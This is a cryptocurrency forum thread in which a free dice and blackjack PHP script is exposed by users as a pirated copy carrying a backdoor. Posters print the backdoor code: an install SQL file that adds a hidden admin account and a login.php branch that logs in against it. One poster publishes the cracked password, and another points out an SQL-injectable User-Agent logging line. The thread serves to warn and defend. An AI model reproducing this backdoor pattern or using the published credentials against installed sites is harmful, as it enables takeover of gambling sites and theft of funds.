[Open Source] CryptoBlackJack & CryptoDice Gambling Scripts

[felinegambler]

CryptoBlackJack
https://github.com/felinegambler/CryptoBlackJack

CryptoDice
https://github.com/felinegambler/CryptoDice

Both scripts are in good working order and are highly secured, CryptoBlackJack is still a little buggy but I am working on that actively (It would be nice to know what bugs you come across).

Both scripts support all Bitcoin based cryptocurrencies.

if you need help with installation I am more than willing to help you. please email me at felinegambler@gmail.com

Please Read

due to me giving this away for free there have been some "authenticity issues", I can assure you this is authentic and working and can only suggest you get someone with PHP skills to read through if you are unsure. - I cannot emphasise this enough.

Have Fun!

[TechnoBibble]

CryptoBlackJack
https://github.com/felinegambler/CryptoBlackJack

CryptoDice
https://github.com/felinegambler/CryptoDice

Both scripts are in good working order and are highly secured, CryptoBlackJack is still a little buggy but I am working on that actively (It would be nice to know what bugs you come across).

Both scripts support all Bitcoin based cryptocurrencies.

if you need help with installation I am more than willing to help you. please email me at felinegambler@gmail.com

Please Read

due to me giving this away for free there have been some "authenticity issues", I can assure you this is authentic and working and can only suggest you get someone with PHP skills to read through if you are unsure. - I cannot emphasise this enough.

Have Fun!

Thank You for the new release, I will Audit these scripts when I get home from work tonight.

[felinegambler]

Thanks. I can assure you there is nothing hidden. It would be good to have an independent audit of the software.

[Muhammed Zakir]

Hello! Can you extract the dice-rolling script from this and send it to me? I can give some BTC if you want.

   ~~MZ~~

[LOBSTER]

Can you show some screenshots? Before downloading and installing, I want to see it

But it's not the script from Johny1976?

[Muhammed Zakir]

But it's not the script from Johny1976?

Johny1976's script isn't free. Anyway, if this script has any portion of Johny's script, I hope you have enough licenses.

   ~~MZ~~

[LOBSTER]

Can you show some screenshots? Before downloading and installing, I want to see it

You can use Github for demos. They offer making sites for the Github repos.

But it's not the script from Johny1976?

Johny1976's script isn't free. Anyway, if this script has any portion of Johny's script, I hope you have enough licenses.

   ~~MZ~~

Hi Muhammed,

where can I find the option for the demo?

It can also be a rip-off of Johnys script.

[felinegambler]

It has elements of johnny's script in, but I took out some of his features... like his backdoors he added. Maybe you should thank him for selling them.

I didn't think this was fair so released it for the majority who cant afford to be scammed. out of 1 BTC and then their wallet contents.

Anyway... Its now on github for people to share and distribute freely.

[Sam the Man]

Working perfectly for me so far.

I was wondering though are there going to be any theme updates?

thanks.

[felinegambler]

Working perfectly for me so far.

I was wondering though are there going to be any theme updates?

thanks.

Hi, I am working on a couple which will be released in the next week

Thank You for your positive feedback.

[elm]

Working perfectly for me so far.

I was wondering though are there going to be any theme updates?

thanks.

Hi, I am working on a couple which will be released in the next week

Thank You for your positive feedback.

I am a noob in coding etc but a gambling expert. how can I see and test the Black Jack script?

@felinegambler could You do a hold'em script? against payment without a backdoor

[felinegambler]

Working perfectly for me so far.

I was wondering though are there going to be any theme updates?

thanks.

Hi, I am working on a couple which will be released in the next week

Thank You for your positive feedback.

I am a noob in coding etc but a gambling expert. how can I see and test the Black Jack script?

@felinegambler could You do a hold'em script? against payment without a backdoor

Yeah of course, Its something a started a while back which I been meaning to finish.

The Backdoors that were in my initial script were from johnny1976 and I didn't notice they were there, I did however promptly remove them. If you are worried get someone to look over the code. To be honest, I wouldn't release this open source for everyone to read if I was going to put backdoors in the code.

I will get to work on the Hold'Em game tonight, As personally its my favorite game.

[LOBSTER]

It has elements of johnny's script in, but I took out some of his features... like his backdoors he added. Maybe you should thank him for selling them.

I didn't think this was fair so released it for the majority who cant afford to be scammed. out of 1 BTC and then their wallet contents.

Anyway... Its now on github for people to share and distribute freely.

Thanks! Nice work!

[Muhammed Zakir]

Hi Muhammed,

where can I find the option for the demo?

It can also be a rip-off of Johnys script.

Sorry! It was meant to OP. OP can setup github links such as brainwallet.github.io . So I just suggested it!

It has elements of johnny's script in, but I took out some of his features... like his backdoors he added. Maybe you should thank him for selling them.

I didn't think this was fair so released it for the majority who cant afford to be scammed. out of 1 BTC and then their wallet contents.

Anyway... Its now on github for people to share and distribute freely.

Working perfectly for me so far.

I was wondering though are there going to be any theme updates?

thanks.

Can you please post pics like LOBSTER said? And, please reply to my question. Thanks!

   ~~MZ~~

[felinegambler]

Hi Muhammed,

where can I find the option for the demo?

It can also be a rip-off of Johnys script.

Sorry! It was meant to OP. OP can setup github links such as brainwallet.github.io . So I just suggested it!

It has elements of johnny's script in, but I took out some of his features... like his backdoors he added. Maybe you should thank him for selling them.

I didn't think this was fair so released it for the majority who cant afford to be scammed. out of 1 BTC and then their wallet contents.

Anyway... Its now on github for people to share and distribute freely.

Working perfectly for me so far.

I was wondering though are there going to be any theme updates?

thanks.

Can you please post pics like LOBSTER said? And, please reply to my question. Thanks!

   ~~MZ~~

Of course, I will get some pics when I am back home tonight and put them on this thread.

Thanks for the github.io link, I will see if I can upload a demo also.

[elm]

Working perfectly for me so far.

I was wondering though are there going to be any theme updates?

thanks.

Hi, I am working on a couple which will be released in the next week

Thank You for your positive feedback.

I am a noob in coding etc but a gambling expert. how can I see and test the Black Jack script?

@felinegambler could You do a hold'em script? against payment without a backdoor

Yeah of course, Its something a started a while back which I been meaning to finish.

The Backdoors that were in my initial script were from johnny1976 and I didn't notice they were there, I did however promptly remove them. If you are worried get someone to look over the code. To be honest, I wouldn't release this open source for everyone to read if I was going to put backdoors in the code.

I will get to work on the Hold'Em game tonight, As personally its my favorite game.

thanks for the good work. may I PM you regarding the holdem? because I have my own holdem idea and would like to know
if You can/would do it and I sure wanna pay for it.

[felinegambler]

of course, send me your suggestions. I will see if I can implement them.

[felinegambler]

Problem

Whist installing the blackjack game I have noticed a problem with the login, I wouldnt suggest downloading this until I have fixed it as it will allow anyone to connect to your admin panel. If you do decide to download this you can rename your admin panel to something else.

[cloverme]

I can check out the blackjack script and see if any of jonnys work is in there. The newbie verifications in this thread doesn't instill a lot of confidence here. Scripts have been long posted here that led to thefts and backdoors, so downloaders beware.

Well, that didn't take long.  At least for the blackjack, this is a pirate copy of johny1976's coinjack.

Install from the OP

Code:

if (isset($_GET['checkCons'])) {
  if (@!mysql_connect($_POST['db_host'],$_POST['db_user'],$_POST['db_pass']) || @!mysql_select_db($_POST['db_name'])) {
    header('Location: ./?step=3&db');
    exit();
  }
  $included_=true;
  include __DIR__.'/db_data.php';
  
  $db_file=fopen('../inc/db-conf.php','wb');
  fwrite($db_file,"<?php \n");          
  fwrite($db_file,'$conf_c=true;'."\n");          
  fwrite($db_file,'mysql_connect(\''.$_POST['db_host'].'\',\''.$_POST['db_user'].'\',\''.$_POST['db_pass'].'\');'."\n");
  fwrite($db_file,'mysql_select_db(\''.$_POST['db_name'].'\');'."\n");
  fwrite($db_file,'mysql_query("SET NAMES utf8");'."\n");
  fwrite($db_file,"?>");      ?><?php
  fclose($db_file);

Install from official Coinjack:

Code:

if (isset($_GET['checkCons'])) {
  if (@!mysql_connect($_POST['db_host'],$_POST['db_user'],$_POST['db_pass']) || @!mysql_select_db($_POST['db_name'])) {
    header('Location: ./?step=3&db');
    exit();
  }

  $included_=true;
  include __DIR__.'/db_data.php';
  
  $db_file=fopen('../inc/db-conf.php','wb');
  fwrite($db_file,"<?php \n");          
  fwrite($db_file,'$conf_c=true;'."\n");          
  fwrite($db_file,'mysql_connect(\''.$_POST['db_host'].'\',\''.$_POST['db_user'].'\',\''.$_POST['db_pass'].'\');'."\n");
  fwrite($db_file,'mysql_select_db(\''.$_POST['db_name'].'\');'."\n");
  fwrite($db_file,'mysql_query("SET NAMES utf8");'."\n");
  fwrite($db_file,"?>");      ?><?php
  fclose($db_file);

[TechnoBibble]

I am also in the process of looking through this script, I agree Downloaders beward of anything and everything... I personally do not install any code that I have not read through myself, As I said on another thread though, I am pretty paranoid regarding security matters.

I will post my findings soon.

Backdoor Found

CoinDice.sql installs a table named "ga_players" with actually an admin account named "playertest" on install, you will see why this is an admin account on the next part.

Code:

DROP TABLE IF EXISTS `ga_players`;
CREATE TABLE `ga_players` (
  `id` int(255) NOT NULL AUTO_INCREMENT,
  `username` varchar(20) COLLATE utf8_unicode_ci NOT NULL,
  `passwd` text COLLATE utf8_unicode_ci NOT NULL,
  `ga_token` text COLLATE utf8_unicode_ci NOT NULL,
  PRIMARY KEY (`id`)
) ENGINE=InnoDB DEFAULT CHARSET=utf8 COLLATE=utf8_unicode_ci;

INSERT INTO `ga_players` (`id`, `username`, `passwd`, `ga_token`) VALUES
(1, 'playertest',  '6d2aff483952d904179ca0c8c536a2c7', '');

When I found this I looked at the admin login script (https://github.com/felinegambler/CryptoDice/blob/master/admin/login.php)

Surprise Surprise

if $_POST variable has any data for "ga_playertest" it allows a login from the "ga_players" table instead of the admin table which in this case hold our fake admin "playertest" - (1, 'playertest',  '6d2aff483952d904179ca0c8c536a2c7', '');

Code:

if (!empty($_POST['ga_playertest'])) {
    $this_admin=mysql_fetch_array(mysql_query("SELECT `username`,`ga_token` FROM `ga_players` WHERE `username`='".prot($_POST['hash_one'])."' AND `passwd`='".md5($_POST['hash_sec'])."' LIMIT 1"));
  } else {
    $this_admin=mysql_fetch_array(mysql_query("SELECT `username`,`ga_token` FROM `admins` WHERE `username`='".prot($_POST['hash_one'])."' AND `passwd`='".md5($_POST['hash_sec'])."' LIMIT 1"));
  }

Everybody should remove this ASAP. You don't know what else could be hidden in here.

I am unsure what MD5 password this ("6d2aff483952d904179ca0c8c536a2c7" ) hash is, maybe someone with more experience in cracking password would know.

cloverme, I am assuming you have the original game? What line is meant to be in login.php?

[LOBSTER]

I can check out the blackjack script and see if any of jonnys work is in there. The newbie verifications in this thread doesn't instill a lot of confidence here. Scripts have been long posted here that led to thefts and backdoors, so downloaders beware.

Well, that didn't take long.  At least for the blackjack, this is a pirate copy of johny1976's coinjack.

Install from the OP

Code:

if (isset($_GET['checkCons'])) {
  if (@!mysql_connect($_POST['db_host'],$_POST['db_user'],$_POST['db_pass']) || @!mysql_select_db($_POST['db_name'])) {
    header('Location: ./?step=3&db');
    exit();
  }
  $included_=true;
  include __DIR__.'/db_data.php';
  
  $db_file=fopen('../inc/db-conf.php','wb');
  fwrite($db_file,"<?php \n");          
  fwrite($db_file,'$conf_c=true;'."\n");          
  fwrite($db_file,'mysql_connect(\''.$_POST['db_host'].'\',\''.$_POST['db_user'].'\',\''.$_POST['db_pass'].'\');'."\n");
  fwrite($db_file,'mysql_select_db(\''.$_POST['db_name'].'\');'."\n");
  fwrite($db_file,'mysql_query("SET NAMES utf8");'."\n");
  fwrite($db_file,"?>");      ?><?php
  fclose($db_file);

Install from official Coinjack:

Code:

if (isset($_GET['checkCons'])) {
  if (@!mysql_connect($_POST['db_host'],$_POST['db_user'],$_POST['db_pass']) || @!mysql_select_db($_POST['db_name'])) {
    header('Location: ./?step=3&db');
    exit();
  }

  $included_=true;
  include __DIR__.'/db_data.php';
  
  $db_file=fopen('../inc/db-conf.php','wb');
  fwrite($db_file,"<?php \n");          
  fwrite($db_file,'$conf_c=true;'."\n");          
  fwrite($db_file,'mysql_connect(\''.$_POST['db_host'].'\',\''.$_POST['db_user'].'\',\''.$_POST['db_pass'].'\');'."\n");
  fwrite($db_file,'mysql_select_db(\''.$_POST['db_name'].'\');'."\n");
  fwrite($db_file,'mysql_query("SET NAMES utf8");'."\n");
  fwrite($db_file,"?>");      ?><?php
  fclose($db_file);

As I said...but he meant that he fixed some bugs.

[elm]

I can check out the blackjack script and see if any of jonnys work is in there. The newbie verifications in this thread doesn't instill a lot of confidence here. Scripts have been long posted here that led to thefts and backdoors, so downloaders beware.

are there many open source gambling scripts with backdoors on github?

[johny1976]

due to me giving this away for free there have been some "authenticity issues", I can assure you this is authentic and working and can only suggest you get someone with PHP skills to read through if you are unsure. - I cannot emphasise this enough.

And it's also copyrighted. Please stop sharing our scripts for free.

SCAMMER

I recommend everyone not to download this backdoored versions of our software. These are not even the latest versions and contain security bugs.

If you buy full license from us, you'll get free lifetime support + updates. See my signature.

[elm]

confused now...where are the backdoors? who is honest here? what is going on here? I cant code so I cant check. whom can I trust?

[LOBSTER]

confused now...where are the backdoors? who is honest here? what is going on here? I cant code so I cant check. whom can I trust?

So true...best option: develop your own script!

[cloverme]

As I said...but he meant that he fixed some bugs.

Sorry, I missed your post on it too. I went through some of the code, but not all of it. Since it's a pirate copy, who knows if it has any exploits in there or not, my advice is to avoid the pirate copy and just buy the script from johny if you want it.

[LOBSTER]

As I said...but he meant that he fixed some bugs.

Sorry, I missed your post on it too. I went through some of the code, but not all of it. Since it's a pirate copy, who knows if it has any exploits in there or not.

At first he should tell us which bugs are in the script and how he fixed it. That would help to trust and retrace.

[TechnoBibble]

For Your Information, I have just found a backdoor in /admin/login.php

Please see this post (https://bitcointalk.org/index.php?topic=908996.msg9994462#msg9994462)

[elm]

confused now...where are the backdoors? who is honest here? what is going on here? I cant code so I cant check. whom can I trust?

So true...best option: develop your own script!

I cant code ( so what should I do?

[cloverme]

Everybody should remove this ASAP. You don't know what else could be hidden in here.

I am unsure what MD5 password this ("6d2aff483952d904179ca0c8c536a2c7" ) hash is, maybe someone with more experience in cracking password would know.

cloverme, I am assuming you have the original game? What line is meant to be in login.php?

I do have the licensed game yes, none of that code is in there, so it looks like you found the exploit in scammers attempt.

[johny1976]

confused now...where are the backdoors? who is honest here? what is going on here? I cant code so I cant check. whom can I trust?

Just compare his modified admin login script with our original:



(original) https://i.imgur.com/NjX9IW5.png
(backdoored) https://github.com/felinegambler/CryptoDice/blob/master/admin/login.php

This should help you guys make clear who is the scammer here. :-)

[cloverme]

confused now...where are the backdoors? who is honest here? what is going on here? I cant code so I cant check. whom can I trust?

Just compare his modified admin login script with our original:



(original) https://i.imgur.com/NjX9IW5.png
(backdoored) https://i.imgur.com/NjX9IW5.png

This should help you guys make clear who is the scammer here. :-)

You posted the same image by accident.

[johny1976]

confused now...where are the backdoors? who is honest here? what is going on here? I cant code so I cant check. whom can I trust?

Just compare his modified admin login script with our original:



(original) https://i.imgur.com/NjX9IW5.png
(backdoored) https://i.imgur.com/NjX9IW5.png

This should help you guys make clear who is the scammer here. :-)

You posted the same image by accident.

Thank you, corrected.

[redsn0w]

Scam accusation against you : https://bitcointalk.org/index.php?topic=909282.0

 Please try to resolve it ( I've left you a negative trust for only a questio of security , when you will resolve this situation I will remove it).

Thanks for the attention , have a great day .

[TechnoBibble]

I have posted a scam report in "scam accusations"

Please post what else you find in there - https://bitcointalk.org/index.php?topic=909282.0

johny1976, Do you have a link to your version that I can put in the solution?

[redsn0w]

I have posted a scam report in "scam accusations"

Please post what else you find in there - https://bitcointalk.org/index.php?topic=909282.0

Thanks I've seen it. Now I suggest to leave a negative trust to  the OP ( for a security reason , it will remove when all the situation will be clarified).

[johny1976]

I have posted a scam report in "scam accusations"

Please post what else you find in there - https://bitcointalk.org/index.php?topic=909282.0

johny1976, Do you have a link to your version that I can put in the solution?

https://bitcointalk.org/index.php?topic=718910.0 - CoinJack
https://bitcointalk.org/index.php?topic=507515.0 - CoinDice

It's also in my signature.

[TechnoBibble]

I have posted a scam report in "scam accusations"

Please post what else you find in there - https://bitcointalk.org/index.php?topic=909282.0

johny1976, Do you have a link to your version that I can put in the solution?

https://bitcointalk.org/index.php?topic=718910.0 - CoinJack
https://bitcointalk.org/index.php?topic=507515.0 - CoinDice

It's also in my signature.

lol, did not see in your sig, I tend to ignore them

added to post.

[elm]

but to  be frank Johnny has the worst support for his Black Jack script IMO please see here
https://bitcointalk.org/index.php?topic=718910.0

[LilGhost]

The admin login page is vulnerable to SQL injection.

Code:

mysql_query("INSERT INTO `admin_logs` (`admin_username`,`ip`,`browser`) VALUES ('".$_SESSION['username']."','".$_SERVER['REMOTE_ADDR']."','".$_SERVER['HTTP_USER_AGENT']."')");

This line is vulnerable to SQL injection if an attacker sends a custom user agent.


Edit: This is a recurring issue through out the script. Frequently the script records the user-agent without sanitizing it first.

[MarkMJ]

Just test the CryptoBlackJack
Have 3 backdoors but good for making a project
Sorry for user that drop this script.

[elm]

Just test the CryptoBlackJack
Have 3 backdoors but good for making a project
Sorry for user that drop this script.

are those 3 backdoors enough to get my coins?

[myfirst]

The admin login page is vulnerable to SQL injection.

Code:

mysql_query("INSERT INTO `admin_logs` (`admin_username`,`ip`,`browser`) VALUES ('".$_SESSION['username']."','".$_SERVER['REMOTE_ADDR']."','".$_SERVER['HTTP_USER_AGENT']."')");

This line is vulnerable to SQL injection if an attacker sends a custom user agent.


Edit: This is a recurring issue through out the script. Frequently the script records the user-agent without sanitizing it first.

Is this issue specifically with this pirated copy or with the original as well?

[johny1976]

The admin login page is vulnerable to SQL injection.

Code:

mysql_query("INSERT INTO `admin_logs` (`admin_username`,`ip`,`browser`) VALUES ('".$_SESSION['username']."','".$_SERVER['REMOTE_ADDR']."','".$_SERVER['HTTP_USER_AGENT']."')");

This line is vulnerable to SQL injection if an attacker sends a custom user agent.


Edit: This is a recurring issue through out the script. Frequently the script records the user-agent without sanitizing it first.

Is this issue specifically with this pirated copy or with the original as well?

Only this pirated copy, in our (original) version that is protected.

[ca333]

I am also in the process of looking through this script, I agree Downloaders beward of anything and everything... I personally do not install any code that I have not read through myself, As I said on another thread though, I am pretty paranoid regarding security matters.

I will post my findings soon.

Backdoor Found

CoinDice.sql installs a table named "ga_players" with actually an admin account named "playertest" on install, you will see why this is an admin account on the next part.

Code:

DROP TABLE IF EXISTS `ga_players`;
CREATE TABLE `ga_players` (
  `id` int(255) NOT NULL AUTO_INCREMENT,
  `username` varchar(20) COLLATE utf8_unicode_ci NOT NULL,
  `passwd` text COLLATE utf8_unicode_ci NOT NULL,
  `ga_token` text COLLATE utf8_unicode_ci NOT NULL,
  PRIMARY KEY (`id`)
) ENGINE=InnoDB DEFAULT CHARSET=utf8 COLLATE=utf8_unicode_ci;

INSERT INTO `ga_players` (`id`, `username`, `passwd`, `ga_token`) VALUES
(1, 'playertest',  '6d2aff483952d904179ca0c8c536a2c7', '');

When I found this I looked at the admin login script (https://github.com/felinegambler/CryptoDice/blob/master/admin/login.php)

Surprise Surprise

if $_POST variable has any data for "ga_playertest" it allows a login from the "ga_players" table instead of the admin table which in this case hold our fake admin "playertest" - (1, 'playertest',  '6d2aff483952d904179ca0c8c536a2c7', '');

Code:

if (!empty($_POST['ga_playertest'])) {
    $this_admin=mysql_fetch_array(mysql_query("SELECT `username`,`ga_token` FROM `ga_players` WHERE `username`='".prot($_POST['hash_one'])."' AND `passwd`='".md5($_POST['hash_sec'])."' LIMIT 1"));
  } else {
    $this_admin=mysql_fetch_array(mysql_query("SELECT `username`,`ga_token` FROM `admins` WHERE `username`='".prot($_POST['hash_one'])."' AND `passwd`='".md5($_POST['hash_sec'])."' LIMIT 1"));
  }

Everybody should remove this ASAP. You don't know what else could be hidden in here.

I am unsure what MD5 password this ("6d2aff483952d904179ca0c8c536a2c7" ) hash is, maybe someone with more experience in cracking password would know.

cloverme, I am assuming you have the original game? What line is meant to be in login.php?

i cracked the md5 hash:

6d2aff483952d904179ca0c8c536a2c7:playertest1

I advice anybody to USE THE ORIGINAL version from johny1976 because the posted scripts have many backdoors and they are pirated copies with NO licence...